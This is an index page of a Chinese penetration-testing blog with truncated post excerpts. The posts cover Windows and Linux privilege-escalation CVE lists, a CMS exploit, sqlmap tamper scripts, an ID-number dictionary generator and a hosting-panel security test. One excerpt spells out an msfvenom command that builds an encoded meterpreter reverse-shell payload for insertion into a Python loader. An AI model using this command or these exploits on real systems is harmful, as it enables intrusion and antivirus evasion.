jasonx's Blog

jasonx 2018/08/25 1481 0

身份证号码字典生成工具查考这里 https://www.jasonx.cc/archives/491.html1．号码的结构 　　公民身份号码是特征组合码，由十七位数字本体码和一位校验码组成。排列顺序从左至右依次为：六位数字地址码，八位数字出生日期码，三位数字顺序码和一位数字校验码。2．地址码 　　表示编码对象常住户口所在县（市、旗、区）的行政区划代码，按GB/T2260的规定执行。3．出生日期码 　　表示编码对象出生的年、月、日...

jasonx 2018/08/25 1641 0

0×01 前言护卫神·主机大师支持一键安装网站运行环境（IIS+ASP+ASP.net+PHP5.2-5.6+MySQL+FTP+伪静态+PhpMyAdmin），并可在线开设主机、SQL Server和MySQL；Web方式管理，拥有独立前台和后台面板。支持Windows Server 2008/2012。结合护卫神14年安全防护经验，严格限制每个站点独立权限，彻底阻挡跨站入侵。但这套系统真的像描述的那么安全么？，由于某次安全测试...

jasonx 2018/08/25 2861 0

漏洞列表#Security Bulletin #KB #Description #Operating SystemCVE-2017-0213 　[Windows COM Elevation of Privilege Vulnerability]　　(windows 10/8.1/7/2016/2010/2008)MS17-010 　[KB4013389]　　[Windows Kernel Mode Drivers]　　(windo...

jasonx 2018/08/25 2584 0

CVE　　#Description　　#KernelsCVE-2017-1000367　　[Sudo](Sudo 1.8.6p7 - 1.8.20)CVE-2017-7494　　[Samba Remote execution](Samba 3.5.0-4.6.4/4.5.10/4.4.14)CVE-2016-5195　　[Dirty cow](Linux kernel>2.6.22 (released in 2007))CV...

jasonx 2018/08/25 1240 0

先用kali生成一个payload> msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.168.2.222 -e x86/shikata_ga_nai -i 11 -f py -o C:/luan/luan.py 然后打开luan.py，替换shellcode部分：from ctypes import * import ctypes shell...

jasonx 2018/08/25 4639 0

0x01 环境准备CLTPHP官网：http://www.cltphp.com网站源码版本：CLTPHP内容管理系统5.5.3版本（2018-01-30 更新）程序源码下载：https://gitee.com/chichu/cltphp默认后台地址： http://127.0.0.1/admin/login/index.html默认账号密码： 后台登录名：admin 密码：admin1230x02 漏洞利用本地测试1、 因为无需任...

jasonx 2018/08/24 1571 0

sqlmap是一款人见人爱的自动化SQL渗透工具，能够以良好的引擎发现给定URL中的可注入处，并自动化的完成注入。但是由于SQL注入的影响过于广泛，致使现代程序的防护越来越严密。sqlmap/tamper是官方给出的一些绕过脚本，可以配合渗透测试人员完成更高效更高质量的测试。本文共分为三个部分，第一部分简要对tamper进行介绍，以及为何要使用它，如何使用；第二部分给出当前最新版本（1.2.7-26）的官方sqlmap提供的tam...